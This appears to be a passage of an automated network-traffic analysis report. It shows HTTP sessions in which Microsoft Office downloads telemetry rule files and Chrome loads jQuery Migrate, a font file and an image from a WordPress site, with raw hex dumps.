                                                                                                                      ETag: "612-56723b57df380"
                                                                                                                      Accept-Ranges: bytes
                                                                                                                      Content-Length: 1554
                                                                                                                      Content-Type: image/png
                                                                                                                      2024-12-03 07:55:23 UTC1554INData Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 00 86 00 00 00 79 08 06 00 00 00 fc bd 59 5d 00 00 00 19 74 45 58 74 53 6f 66 74 77 61 72 65 00 41 64 6f 62 65 20 49 6d 61 67 65 52 65 61 64 79 71 c9 65 3c 00 00 05 b4 49 44 41 54 78 da ec 9d db 6d e2 40 14 86 c7 a3 7d 5f 24 1a 60 2b 58 52 c1 9a 02 90 48 07 50 c1 42 05 40 05 b0 15 40 07 20 a5 00 e8 20 d9 0a 96 06 22 51 c2 7a e2 41 c6 09 9e 33 b6 c7 9e 8b ff 4f 0a 2f b9 f9 f2 f9 9c 39 67 c6 36 63 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 dd 25 f2 6e 8b 5f de 07 c9 e7 d4 b1 ad da b3 71 ff 02 31 ec 49 31 4c 3e 4f c9 57 cf b1 2d bb 26 5f a3 44 8e b7 50 c4 e0 9e 6d ef d2 41 29 98 dc a6 4d 48 11 c3 37 31 26 0e 6f 5b 0c 31 40 f0 40 0c 00 31 80 3e df 02 d9 8f 73 52 11 8c 5a aa 8c 56 72 10 8c 88 01 90 4a 00
                                                                                                                      Data Ascii: PNGIHDRyY]tEXtSoftwareAdobe ImageReadyqe<IDATxm@}_$`+XRHPB@@ "QzA3O/9g6c%n_q1I1L>OW-&_DPmA)MH71&o[1@@1>sRZVrJ


                                                                                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                      108192.168.2.44987013.107.246.63443
                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                      2024-12-03 07:55:22 UTC192OUTGET /rules/rule120667v0s19.xml HTTP/1.1
                                                                                                                      Connection: Keep-Alive
                                                                                                                      Accept-Encoding: gzip
                                                                                                                      User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                      Host: otelrules.azureedge.net
                                                                                                                      2024-12-03 07:55:23 UTC470INHTTP/1.1 200 OK
                                                                                                                      Date: Tue, 03 Dec 2024 07:55:22 GMT
                                                                                                                      Content-Type: text/xml
                                                                                                                      Content-Length: 408
                                                                                                                      Connection: close
                                                                                                                      Cache-Control: public, max-age=604800, immutable
                                                                                                                      Last-Modified: Tue, 09 Apr 2024 00:26:40 GMT
                                                                                                                      ETag: "0x8DC582BB9B6040B"
                                                                                                                      x-ms-request-id: dcd7ccea-901e-005b-7bbf-432005000000
                                                                                                                      x-ms-version: 2018-03-28
                                                                                                                      x-azure-ref: 20241203T075522Z-174f7845968xr5c2hC1EWRd0hn0000000qcg00000000b857
                                                                                                                      x-fd-int-roxy-purgeid: 0
                                                                                                                      X-Cache: TCP_HIT
                                                                                                                      Accept-Ranges: bytes
                                                                                                                      2024-12-03 07:55:23 UTC408INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 36 37 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 36 35 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 5e 28 5b 51 71 5d 5b 45 65 5d 5b 4d 6d 5d 5b 55 75 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d 22 74 72 75 65 22 3e 0d 0a 20 20
                                                                                                                      Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120667" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120665" /> <SR T="2" R="^([Qq][Ee][Mm][Uu])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O="true">


                                                                                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                      109192.168.2.44987213.107.246.63443
                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                      2024-12-03 07:55:22 UTC192OUTGET /rules/rule120669v0s19.xml HTTP/1.1
                                                                                                                      Connection: Keep-Alive
                                                                                                                      Accept-Encoding: gzip
                                                                                                                      User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                      Host: otelrules.azureedge.net
                                                                                                                      2024-12-03 07:55:23 UTC470INHTTP/1.1 200 OK
                                                                                                                      Date: Tue, 03 Dec 2024 07:55:22 GMT
                                                                                                                      Content-Type: text/xml
                                                                                                                      Content-Length: 416
                                                                                                                      Connection: close
                                                                                                                      Cache-Control: public, max-age=604800, immutable
                                                                                                                      Last-Modified: Tue, 09 Apr 2024 00:26:32 GMT
                                                                                                                      ETag: "0x8DC582BB5284CCE"
                                                                                                                      x-ms-request-id: f7ef784b-001e-0066-274f-44561e000000
                                                                                                                      x-ms-version: 2018-03-28
                                                                                                                      x-azure-ref: 20241203T075522Z-174f784596886s2bhC1EWR743w00000015rg000000002uvk
                                                                                                                      x-fd-int-roxy-purgeid: 0
                                                                                                                      X-Cache: TCP_HIT
                                                                                                                      Accept-Ranges: bytes
                                                                                                                      2024-12-03 07:55:23 UTC416INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 36 39 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 36 37 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 52 72 5d 5b 45 65 5d 5b 44 64 5d 20 5b 48 68 5d 5b 41 61 5d 5b 54 74 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d 22 74 72
                                                                                                                      Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120669" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120667" /> <SR T="2" R="([Rr][Ee][Dd] [Hh][Aa][Tt])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O="tr


                                                                                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                      110192.168.2.44987113.107.246.63443
                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                      2024-12-03 07:55:22 UTC192OUTGET /rules/rule120668v0s19.xml HTTP/1.1
                                                                                                                      Connection: Keep-Alive
                                                                                                                      Accept-Encoding: gzip
                                                                                                                      User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                      Host: otelrules.azureedge.net
                                                                                                                      2024-12-03 07:55:23 UTC470INHTTP/1.1 200 OK
                                                                                                                      Date: Tue, 03 Dec 2024 07:55:23 GMT
                                                                                                                      Content-Type: text/xml
                                                                                                                      Content-Length: 469
                                                                                                                      Connection: close
                                                                                                                      Cache-Control: public, max-age=604800, immutable
                                                                                                                      Last-Modified: Tue, 09 Apr 2024 00:26:30 GMT
                                                                                                                      ETag: "0x8DC582BB3CAEBB8"
                                                                                                                      x-ms-request-id: ccb4b789-101e-0028-02af-428f64000000
                                                                                                                      x-ms-version: 2018-03-28
                                                                                                                      x-azure-ref: 20241203T075523Z-174f7845968frfdmhC1EWRxxbw00000015m0000000009cct
                                                                                                                      x-fd-int-roxy-purgeid: 0
                                                                                                                      X-Cache: TCP_HIT
                                                                                                                      Accept-Ranges: bytes
                                                                                                                      2024-12-03 07:55:23 UTC469INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 36 38 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 36 37 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                                      Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120668" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120667" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                      111192.168.2.44987313.107.246.63443
                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                      2024-12-03 07:55:22 UTC192OUTGET /rules/rule120670v0s19.xml HTTP/1.1
                                                                                                                      Connection: Keep-Alive
                                                                                                                      Accept-Encoding: gzip
                                                                                                                      User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                      Host: otelrules.azureedge.net
                                                                                                                      2024-12-03 07:55:23 UTC470INHTTP/1.1 200 OK
                                                                                                                      Date: Tue, 03 Dec 2024 07:55:23 GMT
                                                                                                                      Content-Type: text/xml
                                                                                                                      Content-Length: 472
                                                                                                                      Connection: close
                                                                                                                      Cache-Control: public, max-age=604800, immutable
                                                                                                                      Last-Modified: Tue, 09 Apr 2024 00:25:33 GMT
                                                                                                                      ETag: "0x8DC582B91EAD002"
                                                                                                                      x-ms-request-id: 1e6e7a31-701e-0098-6aa5-43395f000000
                                                                                                                      x-ms-version: 2018-03-28
                                                                                                                      x-azure-ref: 20241203T075523Z-174f7845968cdxdrhC1EWRg0en00000015mg000000004g5h
                                                                                                                      x-fd-int-roxy-purgeid: 0
                                                                                                                      X-Cache: TCP_HIT
                                                                                                                      Accept-Ranges: bytes
                                                                                                                      2024-12-03 07:55:23 UTC472INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 37 30 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 36 39 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                                      Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120670" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120669" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                      112192.168.2.44987413.107.246.63443
                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                      2024-12-03 07:55:23 UTC192OUTGET /rules/rule120671v0s19.xml HTTP/1.1
                                                                                                                      Connection: Keep-Alive
                                                                                                                      Accept-Encoding: gzip
                                                                                                                      User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                      Host: otelrules.azureedge.net
                                                                                                                      2024-12-03 07:55:24 UTC470INHTTP/1.1 200 OK
                                                                                                                      Date: Tue, 03 Dec 2024 07:55:24 GMT
                                                                                                                      Content-Type: text/xml
                                                                                                                      Content-Length: 432
                                                                                                                      Connection: close
                                                                                                                      Cache-Control: public, max-age=604800, immutable
                                                                                                                      Last-Modified: Tue, 09 Apr 2024 00:26:15 GMT
                                                                                                                      ETag: "0x8DC582BAABA2A10"
                                                                                                                      x-ms-request-id: da27d7c4-b01e-005c-4391-3f4c66000000
                                                                                                                      x-ms-version: 2018-03-28
                                                                                                                      x-azure-ref: 20241203T075524Z-174f7845968kdththC1EWRzvxn0000000hy0000000007rwm
                                                                                                                      x-fd-int-roxy-purgeid: 0
                                                                                                                      X-Cache: TCP_HIT
                                                                                                                      Accept-Ranges: bytes
                                                                                                                      2024-12-03 07:55:24 UTC432INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 37 31 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 36 39 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 5e 28 5b 53 73 5d 5b 55 75 5d 5b 50 70 5d 5b 45 65 5d 5b 52 72 5d 5b 4d 6d 5d 5b 49 69 5d 5b 43 63 5d 5b 52 72 5d 5b 4f 6f 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54
                                                                                                                      Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120671" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120669" /> <SR T="2" R="^([Ss][Uu][Pp][Ee][Rr][Mm][Ii][Cc][Rr][Oo])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T


                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                      113192.168.2.449875196.22.142.1434434284C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                      2024-12-03 07:55:24 UTC395OUTGET /wp-includes/js/jquery/jquery-migrate.min.js?ver=3.3.2 HTTP/1.1
                                                                                                                      Host: www.itnaledi.co.za
                                                                                                                      Connection: keep-alive
                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                      Accept: */*
                                                                                                                      Sec-Fetch-Site: none
                                                                                                                      Sec-Fetch-Mode: cors
                                                                                                                      Sec-Fetch-Dest: empty
                                                                                                                      Accept-Encoding: gzip, deflate, br
                                                                                                                      Accept-Language: en-US,en;q=0.9
                                                                                                                      2024-12-03 07:55:24 UTC297INHTTP/1.1 200 OK
                                                                                                                      Date: Tue, 03 Dec 2024 07:55:24 GMT
                                                                                                                      Server: Apache
                                                                                                                      Upgrade: h2,h2c
                                                                                                                      Connection: Upgrade, close
                                                                                                                      Last-Modified: Fri, 02 Dec 2022 09:25:24 GMT
                                                                                                                      ETag: "2bd8-5eed4ead72900"
                                                                                                                      Accept-Ranges: bytes
                                                                                                                      Content-Length: 11224
                                                                                                                      Vary: Accept-Encoding
                                                                                                                      Content-Type: application/javascript
                                                                                                                      2024-12-03 07:55:24 UTC7895INData Raw: 2f 2a 21 20 6a 51 75 65 72 79 20 4d 69 67 72 61 74 65 20 76 33 2e 33 2e 32 20 7c 20 28 63 29 20 4f 70 65 6e 4a 53 20 46 6f 75 6e 64 61 74 69 6f 6e 20 61 6e 64 20 6f 74 68 65 72 20 63 6f 6e 74 72 69 62 75 74 6f 72 73 20 7c 20 6a 71 75 65 72 79 2e 6f 72 67 2f 6c 69 63 65 6e 73 65 20 2a 2f 0a 22 75 6e 64 65 66 69 6e 65 64 22 3d 3d 74 79 70 65 6f 66 20 6a 51 75 65 72 79 2e 6d 69 67 72 61 74 65 4d 75 74 65 26 26 28 6a 51 75 65 72 79 2e 6d 69 67 72 61 74 65 4d 75 74 65 3d 21 30 29 2c 66 75 6e 63 74 69 6f 6e 28 74 29 7b 22 75 73 65 20 73 74 72 69 63 74 22 3b 22 66 75 6e 63 74 69 6f 6e 22 3d 3d 74 79 70 65 6f 66 20 64 65 66 69 6e 65 26 26 64 65 66 69 6e 65 2e 61 6d 64 3f 64 65 66 69 6e 65 28 5b 22 6a 71 75 65 72 79 22 5d 2c 66 75 6e 63 74 69 6f 6e 28 65 29 7b 72
                                                                                                                      Data Ascii: /*! jQuery Migrate v3.3.2 | (c) OpenJS Foundation and other contributors | jquery.org/license */"undefined"==typeof jQuery.migrateMute&&(jQuery.migrateMute=!0),function(t){"use strict";"function"==typeof define&&define.amd?define(["jquery"],function(e){r
                                                                                                                      2024-12-03 07:55:24 UTC3329INData Raw: 75 6d 65 6e 74 2e 72 65 61 64 79 53 74 61 74 65 26 26 75 28 22 6a 51 75 65 72 79 28 77 69 6e 64 6f 77 29 2e 6f 6e 28 27 6c 6f 61 64 27 2e 2e 2e 29 20 63 61 6c 6c 65 64 20 61 66 74 65 72 20 6c 6f 61 64 20 65 76 65 6e 74 20 6f 63 63 75 72 72 65 64 22 29 2c 48 2e 61 70 70 6c 79 28 74 68 69 73 2c 61 72 67 75 6d 65 6e 74 73 29 7d 2c 73 2e 65 61 63 68 28 5b 22 6c 6f 61 64 22 2c 22 75 6e 6c 6f 61 64 22 2c 22 65 72 72 6f 72 22 5d 2c 66 75 6e 63 74 69 6f 6e 28 65 2c 74 29 7b 73 2e 66 6e 5b 74 5d 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 76 61 72 20 65 3d 41 72 72 61 79 2e 70 72 6f 74 6f 74 79 70 65 2e 73 6c 69 63 65 2e 63 61 6c 6c 28 61 72 67 75 6d 65 6e 74 73 2c 30 29 3b 72 65 74 75 72 6e 22 6c 6f 61 64 22 3d 3d 3d 74 26 26 22 73 74 72 69 6e 67 22 3d 3d 74 79 70 65 6f
                                                                                                                      Data Ascii: ument.readyState&&u("jQuery(window).on('load'...) called after load event occurred"),H.apply(this,arguments)},s.each(["load","unload","error"],function(e,t){s.fn[t]=function(){var e=Array.prototype.slice.call(arguments,0);return"load"===t&&"string"==typeo


                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                      114192.168.2.449879196.22.142.1434434284C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                      2024-12-03 07:55:24 UTC685OUTGET /wp-content/themes/salient/css/fonts/fontawesome-webfont.woff?v=4.2 HTTP/1.1
                                                                                                                      Host: www.itnaledi.co.za
                                                                                                                      Connection: keep-alive
                                                                                                                      sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                      Origin: https://www.itnaledi.co.za
                                                                                                                      sec-ch-ua-mobile: ?0
                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                      sec-ch-ua-platform: "Windows"
                                                                                                                      Accept: */*
                                                                                                                      Sec-Fetch-Site: same-origin
                                                                                                                      Sec-Fetch-Mode: cors
                                                                                                                      Sec-Fetch-Dest: font
                                                                                                                      Referer: https://www.itnaledi.co.za/wp-content/themes/salient/css/font-awesome-legacy.min.css?ver=4.7.1
                                                                                                                      Accept-Encoding: gzip, deflate, br
                                                                                                                      Accept-Language: en-US,en;q=0.9
                                                                                                                      2024-12-03 07:55:25 UTC262INHTTP/1.1 200 OK
                                                                                                                      Date: Tue, 03 Dec 2024 07:55:25 GMT
                                                                                                                      Server: Apache
                                                                                                                      Upgrade: h2,h2c
                                                                                                                      Connection: Upgrade, close
                                                                                                                      Last-Modified: Fri, 02 Dec 2022 09:26:32 GMT
                                                                                                                      ETag: "17ee8-5eed4eee4c200"
                                                                                                                      Accept-Ranges: bytes
                                                                                                                      Content-Length: 98024
                                                                                                                      Content-Type: font/woff
                                                                                                                      2024-12-03 07:55:25 UTC7930INData Raw: 77 4f 46 46 00 01 00 00 00 01 7e e8 00 0d 00 00 00 02 86 ac 00 04 00 07 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 46 46 54 4d 00 00 01 30 00 00 00 1c 00 00 00 1c 6b be 47 b9 47 44 45 46 00 00 01 4c 00 00 00 1f 00 00 00 20 02 f0 00 04 4f 53 2f 32 00 00 01 6c 00 00 00 3e 00 00 00 60 88 32 7a 40 63 6d 61 70 00 00 01 ac 00 00 01 69 00 00 02 f2 0a bf 3a 7f 67 61 73 70 00 00 03 18 00 00 00 08 00 00 00 08 ff ff 00 03 67 6c 79 66 00 00 03 20 00 01 5f 79 00 02 4c bc 8f f7 ae 4d 68 65 61 64 00 01 62 9c 00 00 00 33 00 00 00 36 10 89 e5 2d 68 68 65 61 00 01 62 d0 00 00 00 1f 00 00 00 24 0f 03 0a b5 68 6d 74 78 00 01 62 f0 00 00 02 f4 00 00 0a f0 45 79 18 85 6c 6f 63 61 00 01 65 e4 00 00 07 16 00 00 0b 10 02 f5 a2 5c 6d 61 78 70 00 01 6c fc 00 00 00
                                                                                                                      Data Ascii: wOFF~FFTM0kGGDEFL OS/2l>`2z@cmapi:gaspglyf _yLMheadb36-hheab$hmtxbEylocae\maxpl
                                                                                                                      2024-12-03 07:55:25 UTC8000INData Raw: 4c 45 6c be a1 06 11 09 22 c0 49 35 c7 c9 da a6 c0 66 03 55 cc 08 ad c7 32 02 63 14 f6 84 57 2b a6 05 4f 2c 0d b1 af f0 07 4d 16 4a f1 9d 81 a7 36 9e 8f 9e 79 94 3f 2a fc 01 30 26 4e 8f dd 9a f4 78 71 3f a2 1b 29 7f b0 f0 3e 96 65 f9 28 9d 09 1f 40 f9 1f c0 71 54 e6 7f 56 78 bf f0 3e 73 6a 41 f0 a0 69 b4 32 57 40 99 57 16 cb 3c 4b 10 9d 16 ba 18 8a d2 f2 ca 50 0a 2b 1c 0a c0 07 69 0d cc 03 ff b5 04 34 e1 28 d8 a7 f7 87 1c d5 ee 09 05 ed 9a 0a 8f cb 1e d4 f4 78 12 41 bb a6 cc 93 b2 c3 09 31 4a 7a 27 4f bb cc c6 fd 0c eb 3f d2 3c 4c 30 2c 3b 56 7c 27 5b 8c 39 3b 0f 6a 3a 5b 96 a9 42 9e a8 d8 ae 52 6b ce 6e 43 85 2e d0 b8 b5 16 69 de b1 b5 54 f6 bf 89 dd 9d 26 5b 10 15 17 68 a1 92 35 56 c6 2c b3 52 fc b6 0e 49 ec e9 4e c4 7b 18 6f 13 46 7c 54 1b 6e 91 5f 7c
                                                                                                                      Data Ascii: LEl"I5fU2cW+O,MJ6y?*0&Nxq?)>e(@qTVx>sjAi2W@W<KP+i4(xA1Jz'O?<L0,;V|'[9;j:[BRknC.iT&[h5V,RIN{oF|Tn_|
                                                                                                                      2024-12-03 07:55:25 UTC8000INData Raw: 71 4d 4f cf 9a 8d 89 c2 7b ea c9 64 3f 5d 75 fd c9 c6 55 07 3f f7 97 bb 0f 23 c1 2f 3b e9 f2 73 ca 7e f5 f4 e1 bb ff f2 b9 83 ab d8 9a c7 80 4b aa c2 2d 8c 36 03 ca 42 b4 b2 27 15 e9 97 98 cc b5 c4 4c ac d3 67 0f 63 a1 d2 67 26 ad 3d eb 98 d5 47 fa f4 b8 b5 27 cd 0d f9 85 81 7d b5 06 53 ec e5 94 a9 ae a6 e1 a5 56 43 83 49 aa 73 de 79 a7 bf b1 c1 d0 fa 52 43 4d 9d 29 f5 72 cc 64 a8 dd 37 26 55 43 cd 9d 77 d6 34 8c 4e 83 73 63 b2 61 37 cd 66 6c 18 c9 d6 e8 1f 5d 74 83 c1 54 77 f7 dd b5 46 c3 a8 34 e5 6f 92 d1 75 9e e2 d6 8d e5 a7 32 a9 42 aa 3e 23 15 6f 37 28 83 10 f6 bd 4a 7e 6a 89 45 28 16 19 aa 45 4d de 12 ae d1 2d 50 3c 93 d7 6e 7d 82 65 6e aa 70 74 5e bc 90 af 0d d7 5e 3c d3 db eb 35 c7 66 cd ac 9d 3e 33 10 98 f5 ca f7 16 1e 2f 72 51 51 1f 40 e2 c3 57
                                                                                                                      Data Ascii: qMO{d?]uU?#/;s~K-6B'Lgcg&=G'}SVCIsyRCM)rd7&UCw4Nsca7fl]tTwF4ou2B>#o7(J~jE(EM-P<n}enpt^^<5f>3/rQQ@W
                                                                                                                      2024-12-03 07:55:25 UTC8000INData Raw: e5 92 9b ba 13 89 ee 6f bf e4 a9 c3 7d 83 54 df 61 3e f1 e1 91 c4 be a5 18 ed 12 2f c2 1c a1 c7 f7 6f 92 93 e9 14 7a 3e a3 45 7d ca 8b db 0b 0e 60 76 ae 1c 16 7a 25 35 51 91 06 f8 6c 84 a9 d2 a5 48 97 b1 2b d8 2b c3 d3 6c 36 67 9e b4 03 93 53 1a 08 f0 7f c3 94 7c 18 05 1c c5 42 91 e3 68 98 38 be 0f bb da b1 a9 74 12 7d 16 43 5f e1 8f 80 d6 a3 0f 05 2a f0 b0 3d c4 19 af 7f 64 fa 5b c2 99 01 d1 e8 4d 7b f7 1d 57 ec be 4a fc 8a 84 66 03 05 03 77 2e 61 34 b0 8d 34 b2 f3 16 1f e6 44 05 ea 0c 6f c9 01 e4 2a f9 d8 11 56 c0 91 56 41 f6 38 f6 73 50 2d ef c9 d2 9e c2 7d e0 02 9d 41 fe 95 01 ac 22 ee 0d 14 06 1d ce 40 ce 08 22 1c c8 a4 f2 8f 8a 02 b3 af b0 a7 74 30 89 ef c2 11 2b 7c 87 7c 45 91 01 34 18 4e 8a 0c 85 c5 81 93 14 dd 93 31 1a 09 fd 39 eb de 29 2a 97 c6
                                                                                                                      Data Ascii: o}Ta>/oz>E}`vz%5QlH++l6gS|Bh8t}C_*=d[M{WJfw.a44Do*VVA8sP-}A"@"t0+||E4N19)*
                                                                                                                      2024-12-03 07:55:25 UTC8000INData Raw: 0f a8 19 b0 7e 5b 7f 8a 62 fe 8a da 31 42 4d 25 98 43 76 4c 7c 22 30 bc 2d 10 f5 87 6d 01 8b 1f 7d 46 71 24 05 59 22 a1 80 05 3b 28 3a 6a e3 d1 88 2d 86 81 50 3d 34 5d 57 c5 f8 09 08 69 6d 2b 87 77 d0 d4 80 76 5a 39 e6 5a f1 c6 ed db 8c 7c 64 e6 b6 8b e7 dc da 5d 76 ab 38 55 7a a9 78 63 ad c6 cc e9 8c 5d 1b df 4e f8 6e 9d 53 7a eb ac 9d bd 2d 27 3c 15 53 9a 17 d5 ce d2 68 1a 43 1d 35 13 aa 6a 3c d2 94 82 92 e6 da ce f2 09 3c db e4 9f 58 d1 14 2a 11 e9 e4 93 5d 85 87 af 9c 72 ce e4 6a 3b 73 6a 10 0c 51 a7 c0 53 11 70 08 80 e2 8e 7b 01 18 fa 1a 7e 35 c4 17 37 9d 9d be a3 a4 be a4 c0 c0 41 f9 c7 80 66 0d 66 97 bf 0a 7c e3 8b f8 1c 3a 0e 00 f9 35 34 3d 68 04 47 71 95 82 8b 41 b0 25 d4 78 49 6c e4 77 b0 4a cc 60 de 94 cc 50 76 01 dc 2c 08 e9 07 ea 4b a1 37 0b
                                                                                                                      Data Ascii: ~[b1BM%CvL|"0-m}Fq$Y";(:j-P=4]Wim+wvZ9Z|d]v8Uzxc]NnSz-'<ShC5j<<X*]rj;sjQSp{~57Aff|:54=hGqA%xIlwJ`Pv,K7
